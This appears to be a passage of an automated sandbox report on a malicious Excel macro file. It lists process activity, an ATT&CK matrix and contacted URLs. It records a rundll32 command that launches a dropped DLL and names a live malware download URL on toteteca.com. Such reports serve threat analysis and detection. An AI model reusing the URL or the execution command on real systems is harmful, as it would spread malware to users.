    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{81FBE1FA-7F24-41CC-8EB4-5B4036179DB7} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Flopers.GGRRDDFF,DllRegisterServerJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Refusal-376547573-01212021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: Refusal-376547573-01212021.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: Refusal-376547573-01212021.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: Refusal-376547573-01212021.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: Refusal-376547573-01212021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: Refusal-376547573-01212021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: Refusal-376547573-01212021.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: rundll32.exe, 00000001.00000002.229255227.0000000000C60000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000001.00000002.229255227.0000000000C60000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000001.00000002.229255227.0000000000C60000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000001.00000002.229255227.0000000000C60000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Replication Through Removable Media1Scripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Replication Through Removable Media1Data from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryPeripheral Device Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    toteteca.com0%VirustotalBrowse
    cdn.onenote.net0%VirustotalBrowse
    www.toteteca.com2%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://www.toteteca.com/qzkiodlofm/5555555555.jpg100%Avira URL Cloudmalware
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    toteteca.com
    172.107.2.98
    truefalseunknown
    cdn.onenote.net
    unknown
    unknowntrueunknown
    www.toteteca.com
    unknown
    unknowntrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://www.toteteca.com/qzkiodlofm/5555555555.jpgtrue
    • Avira URL Cloud: malware
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
      high
      https://login.microsoftonline.com/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
        high
        https://shell.suite.office.com:144338087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
            high
            https://autodiscover-s.outlook.com/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                high
                https://cdn.entity.38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/query38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                  high
                  https://wus2-000.contentsync.38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://clients.config.office.net/user/v1.0/tenantassociationkey38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                      high
                      https://powerlift.acompli.net38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v138087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                        high
                        https://cortana.ai38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspx38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                  high
                                  https://api.aadrm.com/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                        high
                                        https://cr.office.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControl38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                            high
                                            https://ecs.office.com/config/v2/Office38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                              high
                                              https://graph.ppe.windows.net38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptionevents38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.net38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplate38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://wus2-000.pagecontentsync.38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                          high
                                                          https://store.officeppe.com/addinstemplate38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://dev0-api.acompli.net/autodetect38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.ms38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                              high
                                                              https://graph.windows.net38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                          high
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspx38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                      high
                                                                                      https://management.azure.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/log38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                          high
                                                                                                                          https://ncus-000.contentsync.38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://login.windows.net/common/oauth2/authorize38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                            high
